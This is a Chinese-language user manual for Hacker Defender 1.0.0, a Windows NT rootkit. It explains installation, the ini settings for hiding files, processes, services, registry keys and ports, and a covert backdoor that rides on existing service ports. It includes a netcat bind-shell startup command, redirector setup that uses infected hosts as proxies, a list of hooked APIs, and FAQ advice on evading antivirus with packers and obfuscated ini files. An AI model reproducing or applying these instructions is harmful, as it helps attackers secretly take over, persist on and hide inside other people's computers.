NT Rootkit
----------
Authors: Holy_Father <holy_father@phreaker.net>
Ratter/29A <ratter@atlas.cz>
Version: 1.0.0
Birthday: 01.01.2004
Home: http://www.hxdef.org, http://hxdef.net.ru,
http://hxdef.czweb.org, http://rootkit.host.sk
Mirror: http://hxdef.xtremescripter.de
==========[1.目录]==============================================================
1. 目录
2. 概要
2.1 关于
2.2 申明
3. 使用说明
4. Ini文件说明
5. 后门
5.1 Redirector
6. 技术支持
6.1 版本
6.2 钩子API函数
6.3 已知的 Bugs
7. Faq
8. 文件
==========[ 2. 关于]============================================================
Hacker defender (hxdef)是一个基于Windows NT 4.0, Windows 2000 以及
Windows XP操作系统上的一个Ntrookit,它也能运行于所有基于NT的以后的操作系统。主要
代码是DelPhi 6开发完成。新的部分功能使用汇编书写。驱动代码由C语言完成。后门和
Redirector客户端主要使用 DelPhi 6完成。
程序采用了合适的LED32
LED32,长度分解引擎,32位,(x) 1999-2000 Z0MBiE
REVERT工具专门版
版本 1.05
程序使用超快/超微型压缩/加密数据库
超快/超微型压缩/加密数据库。
(c) 1998 by Jacky Qwerty/29A.
==========[ 2.1 概要 ]==========================================================
程序的主要功能是在所有运行中的进程中重写并分割内存,重写一些基本的模块改
变进程的状态,它几乎能够改写所有不影响系统稳定和正在运行中的进程。
程序能够做到完全隐藏,能够隐藏的文件、进程、系统服务、系统驱动、注册表的
键值和键、开放端口,以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并
且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表键值、系统服务和系统驱动。其
本身的后门技术允许用户植入 Redirector。
==========[ 2.2 申明]===========================================================
本项目1.0.0版本是开发源代码。
使用Hacker defender所造成的后果作者本人概不负责。
==========[ 3.用法 ]============================================================
一个使用Hxdef的简单例子:
>hxdef100.exe [inifile]
或者
>hxdef100.exe [switch]
当直接执行EXE文件,不带任何的参数的时候,默认的inifile文件为程序名.ini。
例如当你执行hedef100不指定ini文件,或者你以参数模式运行时候,默认的文件
hxdef100.ini。
下面的参数是有效的:
-:installonly - 只安装服务,不运行
-:refresh - 从.ini文件中更新设置
-:noservice - 正常运行但不安装服务
-:uninstall - 移除Hxdef。删除所有运行的后门连接,同时停止
hxdef 服务
例如:
>hxdef100.exe -:refresh
Hxdef拥有默认ini文件,但是我们强烈的推荐你建立自己的ini文件。关于ini文件
的介绍可以看第4部分ini文件的介绍部分。
参数 -:refresh 和 -:uninstall 只适用于最初的EXE文件。这就意味这你只要知
道hxdef的运行路径和程序名,就能够改变它的设置或者进行移除工作。
==========[ 4. Ini文件 ]========================================================
Ini文件必须包含9个部分: [Hidden Table], [Root Processes], [Hidden
Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space],
[Hidden Ports]和[Settings]。
在 [Hidden Table], [Root Processes], [Hidden Services]和[Hidden
RegValues] 中能够使用“*”代替后面的字符,星号仅仅能用于字符的后面,任何在"*"之
前的都是无效的。所有在字符之前和之后的空格也是无效的。
例如:
[Hidden Table]
hxdef*
将开始隐藏所有在Hidden Table中以"hxdef"开头的文件、文件夹和系统进程。
在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程
序也会在任务管理器中被隐藏。必须确保主程序,INI文件,你的后门文件和驱动文件被包
含在列表中。
在程序列表中的主进程对感染具有免淤能力,你只能利用主程序才能看见隐藏的文
件,文件夹和程序。所以,主进程是为rootkit管理员所使用的。
由服务和驱动所组成的Hidden Services列表将会隐藏在数据库中的安装服务和驱
动。Rootkit主程序的服务名默认为HackerDefender100,rootkit驱动的驱动名默认为
HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。
Hidden RegKeys中列出的注册表键值将会被隐藏,Rootkit在注册表中有四个键值
:默认的是HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100,
LEGACY_HACKERDEFENDERDRV100 如果你要重新命名服务名或者驱动名,你需要在列表中做相
应的改变。
开始2个键值是和你的服务据用相同名字的,接下来的键值是LEGACY_名字。例如,
如果你改变你的服务名称为BoomThisIsMySvc ,那么在注册表中,应该是这样表示的,
LEGACY_BOOMTHISISMYSVC。
在Hidden RegValues列出的注册表的值将会被隐藏。
Startup Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和
rootkit具有一样的特权。程序名和它后面的参数以 "?"分开。不要使用"字符,程序将会
在用户登陆以后终止,在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快
捷方式。
%cmd% - 标准系统的shell和程序路径
(e.g. C:/winnt/system32/cmd.exe)
%cmddir% - 标准系统的shell文件夹
(e.g. C:/winnt/system32/)
%sysdir% - 系统文件夹
(e.g. C:/winnt/system32/)
%windir% - 标准系统文件夹
(e.g. C:/winnt/)
%tmpdir% - 临时文件夹
(e.g. C:/winnt/temp/)
例如:
1)
[Startup Run]
c:/sys/nc.exe?-L -p 100 -t -e cmd.exe
netcat-shell将会在rootkit运行以后监听100端口
2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
将rootkit启动时间保存在系统临时文件夹夹starttime.Txt文件。
(注意:%TIME%仅仅运行于Windows2000以上的操作系统。)
Free Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM
,其中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。
例如:
[Free Space]
C:123456789
这将在C盘增加大约123M的磁盘空间。
Hidden Ports中列出的是你需要在譬如OpPorts, FPort, Active Ports, Tcp View
等的程序隐藏程序的端口,它最多只能有2行。第1行的格式是
TCP:tppport1,tcpport2,tcpport3 ...第2行的格式是UDP:udpport1,udpport2,udpport3
...
例如:
1)
[Hidden Ports]
TCP:8080,456
这将隐藏2个TCP端口:8080和456
2)
[Hidden Ports]
TCP:8001
UDP:12345
这将隐藏2个端口:TCP的8001和UDP的12345。
3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800
隐藏5个端口,都为UDP端口:53,54,55,56,800。
Settings包含了8个值:Password, BackdoorShell, FileMappingName,
ServiceName,ServiceDisplayName,ServiceDescription, DriverName和DriverFileName。
16位字符的Password被用于后门链接和转向,密码能根据需要短一些,余下的用空
格代替。
BackdoorShell是复制于系统的SHELL文件,它用于创建一个在临时目录下的后门。
FileMappingName,当钩子进程被存储时,用于共享内存。
ServiceName,rootkit服务名称
ServiceDisplayName,rootkit显示的服务名称
ServiceDescription,rootkit的详细服务描述
DriverName,hxdef驱动名称
DriverFileName,hxdef驱动文件名称
例如;
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为
hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker Defender]=-._",服务名为
"HackerDefender100",它显示的名称为"HXD Service 100",它的描述为"poweful NT
rootkit",驱动名为"HackerDefenderDrv100",驱动将被存储于一个叫做"hxdefdrv.sys"的
文件中。
扩展字符|, <, >, :, /, / 和 "在所有的行中都会被忽略,除了[Startup Run],
[Free Space] 和 [Hidden Ports] 项目和在 [Settings] 中first = character后面的值。
使用扩展字符能然你的ini文件摆脱杀毒软件的查杀。
例如:
Example:
[H<<<idden T>>a/"ble]
>h"xdef"*
和下面的是一样的。
[Hidden Table]
hxdef*
更多的例如可以参照hxdef100.ini 和hxdef100.2.ini文件。
所有的在ini文件中的字符串除了那些在Settings 和 Startup Run中的,都是无效
的。
==========[ 5. 后门 ]===========================================================
Rootkit程序 hook了一些API的功能,连接接收一些来自网络的数据包。如果接收
的数据等于256个字节,密码和服务被确认时,将被临时创建一个复制的SHELL,这种链接建
立以后,下一次的数据接收被重定向到这个SHELL上。
因为rootkit程序 Hook了系统中所有进程,所有在服务器上的TCP端口都将变为后
门。例如,如果目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有效的后门
。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的接收缓冲大于或
者等于256个字节。但是这个特征几乎适合于所有标准的服务,像IIS,APACHE,ORACLE等。后
门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的
端口扫描软件找到它,并且它能轻易的穿过系统防火墙。除此之外,还能作为代理服务提供
FTP和HTTP协议支持。
在测试发现IIS服务过程中,HTTP服务不能记录任何的连接日记,FTP和SMTP服务器
仅仅能记录结束的断开连接。所以,如果你运行hxdef在有IIS Web服务的服务器上面,HTTP
端口是你连接机器使用的后门的最好端口。
如果你想连接后门的话,你将不得不使用使用一些特别的客户端,程序
bdcli100.exe就是被用于如此的。
用法:bdcli100.exe host port password
例如:
>bdcli100.exe www.windowsserver.com 80 hxdef-rulez
连接服务器www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他
老的版本。
==========[ 5.1 Redirector ]====================================================
Redirector是基于后门技术。第一个连接包和后门连接一样,这就意味着你能使用
相同的端口。下一个包是仅仅为Redirector特殊的包,这些包由基于运行用户电脑的重定器
生成。第一个重定向的包连接特定的目标主机和端口。
Redirectors的设置保存在与EXE文件同名的INI文件中(所以默认的是
rdrbs100.ini)。如果这个文件不存在,那么在EXE文件运行的时候它会自动建立一个。最
好不要额外的修改INI文件,因为所有的设置都可以在控制命令窗口中进行改变。
当Rootkit被安装时,如果我们需要使用服务器上面的redirectors功能,我们首先
要在本地运行程序。在控制命令窗口中我们可以在安装有Hxdef的服务器上面建立一个映射
端口路由,最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个
版本中连接的速度被限制在256K左右,所以这个版本中redirectors并不适合于高速连接。
Redirectors也会受到安装有rootkit的服务器的限制,而且Redirectors仅仅使用TCP协议连
接。
在这个版本中Redirectors Base有19条命令,他们并不是非常的敏感。关于功能的
详细描述可以使用HELP帮助命令。在Redirectors base启动时,Startup-list中的命令也被
执行。Startup-list中的命令可以用使用su命令启动的CMD进行编辑。
Redirector区分于2种连接类型(HTTP和其他)。如果连接是其他类型的,数据包
将不会被改变。如果是HTTP类型,在HTTP文件头的HOST参数将会改变为目标服务器。一个
Base的最大Redirector数量是1000。
Redirector仅仅适用于NT结构,只有在拥有图标的NT程序下你才能使用HIDE命令隐
藏控制台。只有在NT下才能无声无息的运行,没有数据输出,没有图标,仅仅执行
Startup-list中的命令。
例子:
1)得到端口映射信息
>MPINFO
No mapped ports in the list.
2)增加MPINFO命令到startup-list并且得到startup-list中的命令。
>SUADD MPINFO
>sulist
0) MPINFO
3)使用HELP命令。
>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO,
ADD, DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using
HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER
PORT> <TARGET
SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安装在服务器200.100.2.36的80
端口上,目标服务器是www.google.com80端口。,rootkit的密码是bIgpWd,连接类型HTTP
,目标主机(www.google.com)我们知道它的IP地址是216.239.53.100。
>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
ADD命令可以不加任何参数的运行,在这个例子中我们要求每一个参数都要使用空格分开。
5)现在我们再使用MPINFO检查一下映射端口
>MPINFO
There are 1 mapped ports in the list. Currently 0 of them open.
6)列举端口映射表:
>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7)一个端口映射的详细描述:
>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
8)在没有密码的情况下,我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安
装(但是如果我们能确认它这样做就不再需要)
>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd – OK
如果测试失败则显示:
Testing 0) 200.100.2.36:80:bIgpWd - FAILED
9)在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它,当端口开
放时,我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所
有端口,这个过程可能需要一段的时间。
>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.
或者
>OPEN ALL
Port number 0 opened.
10)要保存当前的设置和列表我们可以使用SAVE命令,将保存所有的设置到ini文件中。(
保存也会通过命令EXIT执行,而不需要DIS标志)
>SAVE
Saved successfully.
打开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址
http://localhost:100/,如果没有什么问题的话,你会看见打开的是www.google.com的主
页。
第一个数据包跟你会延迟5秒钟左右,但是其他的限制仅仅取决于服务器的速度,
根据这个版本的转向技术,你联网的速度大约在256K左右。
==========[ 6. 技术发行]========================================================
这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和
开发人员阅读。
==========[ 6.1 版本 ]==========================================================
TODO - 集成后门, redirector和文件管理器r
- 增加新的后门
- 后门代理支持
- 在远程会话 (Netbios,远程注册表)中隐藏
- 改变内存隐藏类型(高级内存隐藏)
- Hook NtNotifyChangeDirectoryFile
1.0.0 + 开放源代码
0.8.4 + 法语说明
+ 通过NtCreateFile hook隐藏操作文件
+ hxdef 动态邮件跟踪
+ 参数 -:uninstall 移除和升级 hxdef
+ -:refresh 仅能通过原始的.exe文件执行
+ 新的使用说明—— 一点更正,更多的信息和FaQ
+ [Startup Run]快捷方式
+ 通过NtQueryVolumeInformationFile hook构建虚拟空间
+ 通过NtDeviceIoControlFile hook 隐藏开放端口
+ 在ini文件的[Comments]部分增加更多信息
+ 支持在后门进程中使用 Ctrl+C
+ 增加 FileMappingName 参数
+ 在系统层次上运行主进程
+ 通过NtQuerySystemInformation hook隐藏句柄
+ 使用系统驱动
+ 增加反反病毒 ini 文件
+ 使Windows启动和关闭更加稳定
+ 改进内存隐藏
- 当从剪切板中粘贴数据到后门服务端时发现Bugs
x 发现并修复服务名的Bugs
x 发现PID值增加的Bugs,并通过NtOpenProcess hook修复
x 发现并修复在Hook NtReadVirtualMemory时的Bug
x 发现并修复一些单独的小Bug
x 发现并修复一下后门SHELL Bug
0.7.3 + 指定hooking 方法
+ 通过NtQueryDirectoryFile hook隐藏文件
+ 通过NtVdmControl hook在ntvdm隐藏文件
+ 通过NtResumeThread hook hooking新的进程
+ 通过LdrInitializeThunk hook感染进程
+ 通过NtEnumerateKey hook隐藏注册表键
+ 通过NtEnumerateValueKey hook隐藏注册表的键值
+ 通过LdrLoadDll hook感染DLL文件
+ 在ini文件增加更多的设置
+ 支持安全模式
+ 通过 NtReadVirtualMemory hook遮掩内存改变
x 修复调试者的Bug
x 喜欢WIN2000的MSTS bug
x 发现并修复zzZ-service bug
0.5.1 + 不再hook WSOCK
x 修复MSTS的Bug
0.5.0 + 基于后门技术的低层次重新DIR
+ 密码保护
+ ini文件的名字取决于exe文件的名字
+ 提高后门的稳定性
- 限制Redirectors连接的速度为 256 kBps,
不完善Redirector的执行,
不完善Redirector的设计
- 使用象征性连接对象有机会发现Rootkit
- 在使用MS Termnial Services连接时发现Bug
- 发现并修复在16为程序中隐藏文件的Bugs
x 发现并修复列举服务的Bug
x 发现并修复hooking服务时的Bug
0.3.7 + 可以在运行状态中改变设置
+ 在隐藏文件,程序,服务时可以使用通配符
+ 可以在rootkit [startup]中增加程序
x 修复在Windows NT 4.0下隐藏服务的Bugs
0.3.3 + 改善稳定性能
x 修复XP下的所有Bugs
x 发现并修复在隐藏注册表键值的Bugs
x 发现并修复都客户端连接时的后门Bugs
0.3.0 + 改进了后门的连通性,稳定性和功能性
+ 后门总是在系统等级之上运行
+ 后门SHELL隐藏
+ 注册表的值隐藏
x 发现并修复主进程的Bug
- XP重启以后的Bug
0.2.6 x 修复后门中的Bug
0.2.5 + 完全交互的窗口模式
+ 仅仅使用256个字节长度认证后门
+ 改善后门安装
- 后门中的Bug
0.2.1 + 总是以系统服务运行
0.2.0 + 作为系统服务安装
+ 在数据库中隐藏安装服务
+ 隐藏后门
+ 不再运行在WINDOWS界面下
0.1.1 + 在任务管理器中隐藏
+ 使用说明 - 可以在ini文件中进行说明
x 发现并马上修复通讯的Bug
x 修复在使用高级API的Bug
- 修复调试时的Bugs
0.1.0 + 感染系统服务
+ 更小,更简洁,更快的代码,更稳定的程序
x 修复通讯中的Bugs
0.0.8 + 隐藏文件
+ 新进程保护
- 不能感染系统服务
- 通讯中的Bugs
==========[ 6.2 Hooked API ]====================================================
HOOK API 功能列表:
Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 a 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA
==========[ 6.3 已知的Bugs]=====================================================
在这个版本有一个已知的bug。
1)
当你在控制台使用右键或者使用控制台菜单复制大量的数据到剪切板的时候,后台
客户端可能会崩溃。如果程序在运行过程中如上所说,你仍然能使用Ctrl+Ins, Shift+Ins
从剪切板中粘贴数据。
如果你发现了Bugs请报告给公共留言簿(如果你是测试人员请发送到测试人员留言
簿)或者E-mail到rootkit@host.sk。但是必须保证你已经阅读了使用说明FAQ部分,本文档
的TODO部分和留言簿,并且你在发现之前还没有任何其他的相关资料。
==========[ 7. Faq ]============================================================
因为在留言簿上出现了大量的简单问题,使我意识到需要写这个FAQ部分在这个使
用说明中。在你问任何问题之前请先阅读这个使用说明2次并且特别注意这个部分。然后查
看留言簿中以前的帖子,如果你发现你还使不能找到解决的答案,请把你的问题发到留言簿
中。
这些问题是:
1)我下载了hxdef,运行了但不能删除它,如果我不能看见它的进程、服务和文件,我怎么
删除它?
2)一些人黑客我的机器,运行了hxdef我不能删除它。我怎么才能卸载它和所有安装在我电
脑上的后门程序?
3)这个程序能被杀毒软件查杀吗?如果是,怎么才能让它不被查杀?
4)当服务器开放135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP端口的时候,为什么我
不能通过这些端口连接我的后门?
5)当文件在磁盘上是可见的时候,还有什么办法隐藏进程吗?
6)怎么样隐藏svchost.exe和其他我能够在任务管理器上看见的进程?
7)当我使用DameWare时我能看见所有本应该被隐藏的服务和其他,这是一个Bug吗?
8)但是所有经过netbios的人都能看见我隐藏的文件,我该怎么做?
9)后门客户端不工作。每次看上去好像是OK的,但是连接上以后我不能输入任何东西,整
个控制台也是黑色的。我该怎么做?
10)什么时候我们能得到新的版本?
11)Net.exe命令不能停止隐藏的服务,这是一个Bug吗?
12)有什么方法找到Rootkit吗?
13)既然找出hxdef很难,有人能写出一个程序吗?
14)我怎么样才能找出它?
15)版本的数量从0开始是否意味这它没有固定的版本?
16)你什么时候公布源代码?我想阅读1.0.0版本的代码,什么时候公布呢?
17)我想成为一个测试人员,我该怎么做?
18)使用hxdef符合法律吗?
19)能否将老的hxdef升级到限制的版本?有办法不需要重新启动机器吗?
20)这个版本的hxdef能否升级为以后的新版本?不需要重启电脑可以吗?
21)使用-:uninstall好,还是使用net stop ServiceName好?
22)我真的很喜欢这个程序,我可以支持你的工作并给你一点捐助吗?
23)在哪里可以改变隐藏C:/temp而不是隐藏C:/winnt/temp?
24)我在ini文件中找到的密码是明文的,是这样的吗?
25)如果我在Hidden Table 隐藏一个监听于某一端口的进程,这个端口也会自动隐藏吗?
还是需要在Hidden Ports设置?
问题的答案:
1)
Q: 我下载了hxdef,运行了但不能删除它,如果我不能看见它的进程、服务和文件,我怎么
删除它?
A: 如果你保留了最初的设置你可以在SHELL中停止服务:
>net stop HackerDefender100
hxdef将会停止服务完全的卸载。这和-:uninstall是一样的,但是你不需要知道hxdef在什
么地方。如果你在ini文件设置中更改了服务名,在CMD下输入:
>net stop ServiceName
其中ServiceName 是你在ini文件进行设置的服务名。如果你忘记了服务名,你可以使用系
统启动光盘重新启动到DOS环境,找出hxdef的ini文件,打开并找出它的服务名。
2)
Q: 一些人黑客我的机器,运行了hxdef我不能删除它。我怎么才能卸载它和所有安装在我电
脑上的后门程序?
A: 唯一能做的就是重新安装你的操作系统。但是如果你能和上面的情况一样找出ini文件,
根据ini文件卸载hxdef,再找出所有在Hidden Table中列出的文件,确认这些文件并且完全
删除它们。
3)
Q: 这个程序能被杀毒软件查杀吗?如果是,怎么才能让它不被查杀?
A: 是的,不仅仅exe文件会被查杀,一些杀毒软件甚至能查杀ini文件和驱动文件。第二个
问题的答案就是,你能很轻松的躲避查杀。在hxdef主页你可以发现一个工具叫做Morphine
,如果你在hxdef的exe文件上使用了Morphine,你会得到一个新的exe文件,这个文件不会
被普通的杀毒软件查杀。Ini文件也能设计为躲避杀毒软件,你可以增加一些扩展字符以抵
抗杀毒系统。详细的可以看 4.ini文件部分,也可以看包含的ini文件,这2个样本是一样的
,但是第一个使用了扩展字符让它能够躲过杀毒软件。也许在使用Morphine之前最好的方法
是使用UPX,UPX将会减少hedef的exe文件大小,Morphine将会遮蔽杀毒软件,关于更多的可
以看Morphine的使用说明。
4)
Q: 当服务器开放135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP端口的时候,为什么我
不能通过这些端口连接我的后门?
A: 这个问题在第五部分——后门章节被提及到。后门需要服务器接收缓冲大于或者等于256
个字节,还有就是系统的端口可能能正常工作。如果你遇到了这样的问题,你可以简单的用
NC监听一个你自己的端口,你需要增加这个NC端口到ini文件的Hidden Ports。
5)
Q: 当文件在磁盘上是可见的时候,还有什么办法隐藏进程吗?
A: 不能,你也不能隐藏在磁盘上文件的进程,当它在认为管理器中是可见的时候。
6)
Q: 怎么样隐藏svchost.exe和其他我能够在任务管理器上看见的进程?
A: 这真的是一个坏的注意,如果你隐藏了系统必需的进程,你的WINDOWS将会马上崩溃。拥
有hxdef你不需要命名你那些恶意程序为svchost.exe, lsass.exe等。你可以将它命名为任
何名字然后在Hidden Table隐藏它。
7)
Q: 当我使用DameWare时我能看见所有本应该被隐藏的服务和其他,这是一个Bug吗?
A: 不是。DameWare或者其他个人使用的远程sessions (或者 netbios)能够看见服务,是因
为这个功能还没有实现。它是介于Bug和未开发的一个大问题。看网站TODO列表,这些功能
还未开发。
8)
Q: 但是所有经过netbios的人都能看见我隐藏的文件,我该怎么做?
A: 把你的文件深深的放在系统文件夹里面或者不要共享文件夹。
9)
Q: 后门客户端不工作。每次看上去好像是OK的,但是连接上以后我不能输入任何东西,整
个控制台也是黑色的。我该怎么做?
A: 你可能使用了一个错误的端口连接。Hxdef能自动的检测错误的端口并且中断你的连接,
但是有时候也许不能检测到你使用错误的端口。所以,请使用另外的一个不同端口。
10)
Q: 什么时候我们能得到新的版本?
A: 开发者都是在业余时间开发代码。他们没有从这个上面得到任何的钱而且也不会从这个
上面得到钱。现在只有2位代码开发者我们认为这已经足够了。这就意味这我们不会象微软
那样快的发布程序,你最好的是等,不要问我们什么时候将会公布新的版本。不像微软,我
们的产品都是免费的并且拥有良好的测试人员,我们测试这个程序很多次,所以发布的都是
非常的稳定的。
11)
Q: Net.exe命令不能停止隐藏的服务,这是一个Bug吗?
A: 不是,这不是一个bug,而是它的特征。如果你隐藏了它,只有rootkit的管理员在知道
服务名的情况下才能停止它。所以不要害怕通过这种方式能发现你。
12)
Q: 有什么方法找到Rootkit吗?
A: 是的。有很多种方式能找出所有的rootkit,这个也不例外。任何的rootkit都能被检测
。唯一的问题是在于别人把他配置成什么样子用它来做什么。
13)
Q: 既然找出hxdef很难,有人能写出一个程序吗?
A: 很容易就能发现它,但是我不知道有什么特别的软件能马上告诉你你的机器上面安装有
hxdef。
14)
Q: 我怎么样才能找出它?
A: 我不会告诉你的。呵呵!
15)
Q: 版本的数量从0开始是否意味这它没有固定的版本?
A: 不。它表示一些小的未开发的东西将会在下次开发被完善。
16)
Q: 你什么时候公布源代码?我想阅读1.0.0版本的代码,什么时候公布呢?
A: 我真的不知道。在发布1.0.0版本以后有很多的事情需要我去开发。它可能需要6个月或
者更长的时间。
17)
Q: 我想成为一个测试人员,我该怎么做?
A: 你可以写信告诉我你该怎么做,告诉我你作为一个测试人员的工作能力和经验。但是成
为一个新的测试人员的机会是相当小的。现在我们有足够的测试人员他们都做得很好,不需
要增加人员。
18)
Q: 使用hxdef符合法律吗?
A: 当然是。但是hxdef经常被用于非法行为。
19)
Q: 能否将老的hxdef升级到限制的版本?有办法不需要重新启动机器吗?
A: 不可能不需要重启你的电脑,但是你可以手工卸载老的版本进行升级,重启你的电脑进
行安装新的版本。
20)
Q: 这个版本的hxdef能否升级为以后的新版本?不需要重启电脑可以吗?
A: 是的,你可以使用-:uninstall完全移除hxdef的这个版本不需要重启电脑,在安装新的
版本。
21)
Q: 使用-:uninstall好,还是使用net stop ServiceName好?
A: 最好的方式是使用-:uninstall进行卸载,如果有可能的话,不过使用net stop也能得到
一样的效果。
22)
Q: 我真的很喜欢这个程序,我可以支持你的工作并给你一点捐助吗?
A: 我们不需要。但是我们希望你能把钱捐献给你的国家的任何慈善机构,写份MAIL告诉我
们关于这件事情。
23)
Q: 在哪里可以改变隐藏C:/temp而不是隐藏C:/winnt/temp?
A: 不能。创建你自己的文件夹并把名字放在Hidden Table下面。
24)
Q: 我在ini文件中找到的密码是明文的,是这样的吗?
A: 你可能认为这是一个非常不安全的方法存储密码,但是如果你隐藏你的ini文件没有能够
找到,这就是安全的。这个很容易在任何时间进行改变,你可以使用-: refresh非常轻松的
改变你的密码。
25)
Q: 如果我在Hidden Table 隐藏一个监听于某一端口的进程,这个端口也会自动隐藏吗?还
是需要在Hidden Ports设置?
A: 只有在Hidden Ports列表种的端口才能被隐藏。所以,请把它的端口放在Hidden Ports
中。
==========[ 8. 文件 ]===========================================================
defender v1.0.0包含下列的原是档案文件:
hxdef100.exe 70 144 b - Hacker defender v1.0.0程序
hxdef100.ini 3 872 b - 默认的ini设置文件
hxdef100.2.ini 3 695 b - 默认的ini设置文件, 第2类
bdcli100.exe 26 624 b - 后门客户端
rdrbs100.exe 49 152 b - Redirectors Base
readmecz.txt 34 654 b - 捷克语版说明文件
readmeen.txt 35 956 b - 英语说明文件
readmefr.txt 38 029 b - 法语说明文件
src.zip 91 936 b - 源代码
readmecn.txt 26 923 b - 中文说明文件